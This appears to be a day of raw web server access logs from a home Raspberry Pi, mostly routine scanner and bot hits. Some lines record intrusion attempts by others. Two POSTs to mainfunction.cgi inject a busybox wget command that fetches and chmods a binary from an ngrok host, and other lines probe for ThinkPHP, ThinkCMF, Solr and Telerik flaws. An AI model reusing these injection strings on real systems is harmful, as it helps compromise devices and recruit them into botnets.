Wed May 20 06:25:08 MDT 2020 06:25:08 up 85 days, 10:53, 1 user, load average: 0.57, 0.31, 0.28 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 85days 1:35m 3.49s /usr/bin/lxsession -s LXDE-pi -e LXDE 190.114.246.42 - - [20/May/2020:13:43:37 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" "" 190.114.246.42 - - [20/May/2020:13:43:39 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 170.233.45.183 - - [20/May/2020:14:13:04 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 94.177.86.39 - - [20/May/2020:14:57:10 +0000] "GET / HTTP/1.1" 200 25000 "" "" 71.6.232.4 - - [20/May/2020:15:41:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36" 104.152.52.22 - - [20/May/2020:15:43:11 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 196.52.43.115 - - [20/May/2020:15:54:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36" 191.8.80.207 - - [20/May/2020:16:58:53 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 195.54.160.123 - - [20/May/2020:17:03:59 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.123 - - [20/May/2020:17:21:05 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.123 - - [20/May/2020:17:22:47 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 208.91.109.50 - - [20/May/2020:17:26:01 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 208.91.109.50 - - [20/May/2020:17:26:02 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 162.243.137.42 - - [20/May/2020:17:41:05 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 195.54.160.123 - - [20/May/2020:17:43:17 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 196.52.43.58 - - [20/May/2020:18:27:25 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36" 208.91.109.50 - - [20/May/2020:19:26:49 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 208.91.109.50 - - [20/May/2020:19:26:49 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 123.208.8.171 - - [20/May/2020:20:03:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 181.48.164.98 - - [20/May/2020:21:05:18 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" "" 181.48.164.98 - - [20/May/2020:21:05:18 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 14.168.124.105 - - [20/May/2020:21:37:04 +0000] "GET / HTTP/1.1" 400 0 "" "" 193.118.53.210 - - [20/May/2020:21:59:46 +0000] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 80.82.77.33 - - [20/May/2020:22:06:43 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 80.82.77.33 - - [20/May/2020:22:06:44 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "" 80.82.77.33 - - [20/May/2020:22:06:45 +0000] "GET /sitemap.xml HTTP/1.1" 200 186 "" "" 80.82.77.33 - - [20/May/2020:22:06:46 +0000] "GET /.well-known/security.txt HTTP/1.1" 404 0 "" "" 80.82.77.33 - - [20/May/2020:22:06:50 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "python-requests/2.23.0" 177.68.127.253 - - [20/May/2020:22:08:35 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 128.14.209.250 - - [20/May/2020:22:28:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 113.11.40.43 - - [20/May/2020:23:32:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 5.13.72.59 - - [20/May/2020:23:52:56 +0000] "GET / HTTP/1.0" 200 25000 "" "" 89.40.182.58 - - [21/May/2020:00:56:01 +0000] "GET / HTTP/1.1" 400 0 "" "" 69.89.209.221 - - [21/May/2020:01:04:20 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 162.243.139.8 - - [21/May/2020:01:26:54 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 178.46.212.185 - - [21/May/2020:01:32:58 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 178.46.212.185 - - [21/May/2020:01:32:58 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 178.93.9.63 - - [21/May/2020:01:53:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 35.233.105.134 - - [21/May/2020:02:21:41 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 35.205.86.202 - - [21/May/2020:03:13:06 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 35.233.105.134 - - [21/May/2020:04:44:10 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 179.189.196.238 - - [21/May/2020:06:24:25 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 35.233.105.134 - - [21/May/2020:07:08:49 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 81.26.142.239 - - [21/May/2020:07:10:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 45.83.65.241 - - [21/May/2020:07:19:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" 164.68.116.29 - - [21/May/2020:07:27:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 223.149.110.208 - - [21/May/2020:08:40:03 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" "" 5.32.177.144 - - [21/May/2020:08:55:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 200.24.195.116 - - [21/May/2020:09:03:14 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 190.128.154.222 - - [21/May/2020:09:48:01 +0000] "HEAD / HTTP/1.1" 200 0 "" "" 190.128.154.222 - - [21/May/2020:09:48:01 +0000] "GET / HTTP/1.1" 200 25000 "" "" 190.128.154.222 - - [21/May/2020:09:48:02 +0000] "HEAD /invoker/EJBInvokerServlet HTTP/1.1" 404 0 "" "" 162.243.144.247 - - [21/May/2020:09:58:47 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 35.233.105.134 - - [21/May/2020:10:09:18 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 103.113.98.207 - - [21/May/2020:10:49:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 176.113.115.249 - - [21/May/2020:11:14:08 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 27.48.138.13 - - [21/May/2020:11:16:04 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" Thu May 21 06:25:05 MDT 2020 06:25:06 up 86 days, 10:53, 1 user, load average: 0.39, 0.27, 0.28 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 86days 1:36m 3.49s /usr/bin/lxsession -s LXDE-pi -e LXDE